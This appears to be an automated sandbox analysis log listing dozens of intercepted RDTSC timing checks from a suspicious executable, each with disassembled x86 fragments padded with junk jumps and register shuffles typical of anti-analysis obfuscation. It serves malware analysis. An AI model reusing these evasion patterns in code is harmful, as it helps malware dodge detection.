Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741025B second address: 7410318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ebx, 2D471AE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov ax, 7B79h 0x00000014 mov eax, 385B5635h 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c mov si, 16EDh 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FE908EE7118h 0x00000027 and si, 11B8h 0x0000002c jmp 00007FE908EE710Bh 0x00000031 popfd 0x00000032 popad 0x00000033 popad 0x00000034 call dword ptr [76E80B60h] 0x0000003a mov eax, 7617E5E0h 0x0000003f ret 0x00000040 jmp 00007FE908EE7115h 0x00000045 push 00000044h 0x00000047 jmp 00007FE908EE710Eh 0x0000004c pop edi 0x0000004d pushad 0x0000004e movzx ecx, dx 0x00000051 pushfd 0x00000052 jmp 00007FE908EE7113h 0x00000057 and ax, AD8Eh 0x0000005c jmp 00007FE908EE7119h 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 mov edi, 17A10AEEh 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410318 second address: 741034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 call 00007FE9093D653Ch 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov cx, D34Dh 0x00000014 mov di, cx 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a movzx esi, di 0x0000001d movsx ebx, cx 0x00000020 popad 0x00000021 push dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edi 0x00000027 pop ecx 0x00000028 mov ax, di 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74103D2 second address: 74103D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74103D6 second address: 74103F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74103F3 second address: 741040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741040F second address: 7410413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410413 second address: 7410441 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007FE978906393h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FE908EE710Ah 0x00000017 or ecx, 3595E3D8h 0x0000001d jmp 00007FE908EE710Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410441 second address: 7410493 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FE9093D653Bh 0x0000000c pop eax 0x0000000d popad 0x0000000e mov eax, 00000000h 0x00000013 jmp 00007FE9093D6544h 0x00000018 mov dword ptr [esi], edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edi, 6145A980h 0x00000022 call 00007FE9093D6549h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410493 second address: 7410499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410499 second address: 741049D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741049D second address: 74104E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE908EE710Eh 0x00000015 adc esi, 6A1B2D58h 0x0000001b jmp 00007FE908EE710Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov ebx, esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74104E4 second address: 74104E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74104E8 second address: 7410501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+08h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE908EE710Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410501 second address: 7410535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE9093D6548h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410535 second address: 7410539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410539 second address: 741053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741053F second address: 7410563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE908EE710Ch 0x00000009 and eax, 61485C78h 0x0000000f jmp 00007FE908EE710Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410563 second address: 741058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a jmp 00007FE9093D6544h 0x0000000f mov dword ptr [esi+10h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741058A second address: 741058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741058E second address: 7410594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410594 second address: 74105E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c pushad 0x0000000d mov dx, AC4Ch 0x00000011 mov dl, 41h 0x00000013 popad 0x00000014 mov dword ptr [esi+14h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE908EE7119h 0x00000020 and eax, 432977D6h 0x00000026 jmp 00007FE908EE7111h 0x0000002b popfd 0x0000002c push eax 0x0000002d pop ebx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410724 second address: 7410741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9093D653Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410741 second address: 741078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c jmp 00007FE908EE710Eh 0x00000011 mov eax, dword ptr [ebx+68h] 0x00000014 jmp 00007FE908EE7110h 0x00000019 mov dword ptr [esi+2Ch], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741078B second address: 741078F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741078F second address: 7410793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410793 second address: 7410799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410799 second address: 74107D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bl, 27h 0x00000012 jmp 00007FE908EE7116h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74107D1 second address: 7410823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007FE9093D6546h 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 pushad 0x0000001a jmp 00007FE9093D653Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007FE9093D6540h 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410823 second address: 741086A instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov word ptr [esi+32h], ax 0x0000000c jmp 00007FE908EE710Ah 0x00000011 mov eax, dword ptr [ebx+0000008Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE908EE710Dh 0x00000020 add si, 9886h 0x00000025 jmp 00007FE908EE7111h 0x0000002a popfd 0x0000002b mov dh, ah 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741086A second address: 7410887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D6549h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410887 second address: 74108AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE908EE7118h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108AC second address: 74108C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108C4 second address: 74108C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108C8 second address: 74108CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108CE second address: 74108D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108D4 second address: 74108D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108D8 second address: 7410948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e jmp 00007FE908EE7110h 0x00000013 mov eax, dword ptr [ebx+1Ch] 0x00000016 jmp 00007FE908EE7110h 0x0000001b mov dword ptr [esi+3Ch], eax 0x0000001e jmp 00007FE908EE7110h 0x00000023 mov eax, dword ptr [ebx+20h] 0x00000026 pushad 0x00000027 mov dx, si 0x0000002a mov esi, 527EC369h 0x0000002f popad 0x00000030 mov dword ptr [esi+40h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FE908EE710Bh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410948 second address: 741094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741094E second address: 741098C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+00000080h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FE908EE7112h 0x0000001a and ax, 7498h 0x0000001f jmp 00007FE908EE710Bh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741098C second address: 7410990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410990 second address: 7410A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, 06h 0x00000008 popad 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE908EE7117h 0x00000012 add cx, 1A0Eh 0x00000017 jmp 00007FE908EE7119h 0x0000001c popfd 0x0000001d push eax 0x0000001e mov si, dx 0x00000021 pop ebx 0x00000022 popad 0x00000023 nop 0x00000024 pushad 0x00000025 push ecx 0x00000026 push edx 0x00000027 pop esi 0x00000028 pop edx 0x00000029 pushfd 0x0000002a jmp 00007FE908EE710Ch 0x0000002f add esi, 1F0483B8h 0x00000035 jmp 00007FE908EE710Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e mov bx, 1FDAh 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FE908EE7111h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410A18 second address: 7410ABB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE9093D6540h 0x00000008 sub ch, 00000048h 0x0000000b jmp 00007FE9093D653Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 movzx eax, bx 0x00000019 pushfd 0x0000001a jmp 00007FE9093D6541h 0x0000001f xor cx, 2266h 0x00000024 jmp 00007FE9093D6541h 0x00000029 popfd 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e pushad 0x0000002f call 00007FE9093D653Ch 0x00000034 pop esi 0x00000035 push edx 0x00000036 pushfd 0x00000037 jmp 00007FE9093D653Ah 0x0000003c or esi, 508F8D38h 0x00000042 jmp 00007FE9093D653Bh 0x00000047 popfd 0x00000048 pop ecx 0x00000049 popad 0x0000004a push edx 0x0000004b jmp 00007FE9093D6544h 0x00000050 mov dword ptr [esp], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410ABB second address: 7410ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410ABF second address: 7410ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B64 second address: 7410B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B68 second address: 7410B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B83 second address: 7410B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B9B second address: 7410B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B9F second address: 7410C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FE978905C22h 0x0000000e pushad 0x0000000f mov dl, 07h 0x00000011 pushfd 0x00000012 jmp 00007FE908EE7116h 0x00000017 sub al, 00000038h 0x0000001a jmp 00007FE908EE710Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [ebp-0Ch] 0x00000024 jmp 00007FE908EE7116h 0x00000029 mov dword ptr [esi+04h], eax 0x0000002c pushad 0x0000002d movzx eax, di 0x00000030 push edx 0x00000031 mov edi, eax 0x00000033 pop eax 0x00000034 popad 0x00000035 lea eax, dword ptr [ebx+78h] 0x00000038 jmp 00007FE908EE7111h 0x0000003d push 00000001h 0x0000003f jmp 00007FE908EE710Eh 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FE908EE710Ah 0x0000004e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410C2F second address: 7410C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410C35 second address: 7410CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE908EE710Bh 0x0000000f nop 0x00000010 pushad 0x00000011 jmp 00007FE908EE7114h 0x00000016 pushfd 0x00000017 jmp 00007FE908EE7112h 0x0000001c jmp 00007FE908EE7115h 0x00000021 popfd 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-08h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FE908EE710Ch 0x0000002d sub ecx, 09C4CE78h 0x00000033 jmp 00007FE908EE710Bh 0x00000038 popfd 0x00000039 mov dl, cl 0x0000003b popad 0x0000003c push esi 0x0000003d jmp 00007FE908EE7110h 0x00000042 mov dword ptr [esp], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FE908EE7117h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D32 second address: 7410D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D38 second address: 7410D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D3C second address: 7410D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D4C second address: 7410D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D50 second address: 7410D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D56 second address: 7410D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FE978905A5Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D71 second address: 7410D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D8C second address: 7410DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410DA4 second address: 7410DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410DA8 second address: 7410E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b jmp 00007FE908EE7117h 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 jmp 00007FE908EE7116h 0x00000018 lea eax, dword ptr [ebx+70h] 0x0000001b jmp 00007FE908EE7110h 0x00000020 push 00000001h 0x00000022 jmp 00007FE908EE7110h 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov dx, EDF0h 0x0000002f mov si, dx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E14 second address: 7410E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE9093D653Bh 0x0000000f nop 0x00000010 pushad 0x00000011 push eax 0x00000012 movsx edx, cx 0x00000015 pop ecx 0x00000016 call 00007FE9093D653Dh 0x0000001b mov ecx, 5FA2F357h 0x00000020 pop eax 0x00000021 popad 0x00000022 lea eax, dword ptr [ebp-18h] 0x00000025 pushad 0x00000026 jmp 00007FE9093D6549h 0x0000002b movzx esi, dx 0x0000002e popad 0x0000002f push esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE9093D6542h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E89 second address: 7410E98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E98 second address: 7410E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E9E second address: 7410EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410F0F second address: 7410FBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9093D653Fh 0x00000009 sub ax, C43Eh 0x0000000e jmp 00007FE9093D6549h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a js 00007FE978DF4C9Eh 0x00000020 jmp 00007FE9093D6543h 0x00000025 mov eax, dword ptr [ebp-14h] 0x00000028 pushad 0x00000029 pushad 0x0000002a mov dl, al 0x0000002c mov cl, dh 0x0000002e popad 0x0000002f jmp 00007FE9093D6548h 0x00000034 popad 0x00000035 mov ecx, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FE9093D653Dh 0x00000040 adc si, F136h 0x00000045 jmp 00007FE9093D6541h 0x0000004a popfd 0x0000004b jmp 00007FE9093D6540h 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410FBE second address: 7411033 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE908EE7111h 0x00000009 adc ch, 00000046h 0x0000000c jmp 00007FE908EE7111h 0x00000011 popfd 0x00000012 call 00007FE908EE7110h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e jmp 00007FE908EE7111h 0x00000023 mov edx, 76EB06ECh 0x00000028 jmp 00007FE908EE710Eh 0x0000002d sub eax, eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE908EE710Ch 0x00000036 rdtsc
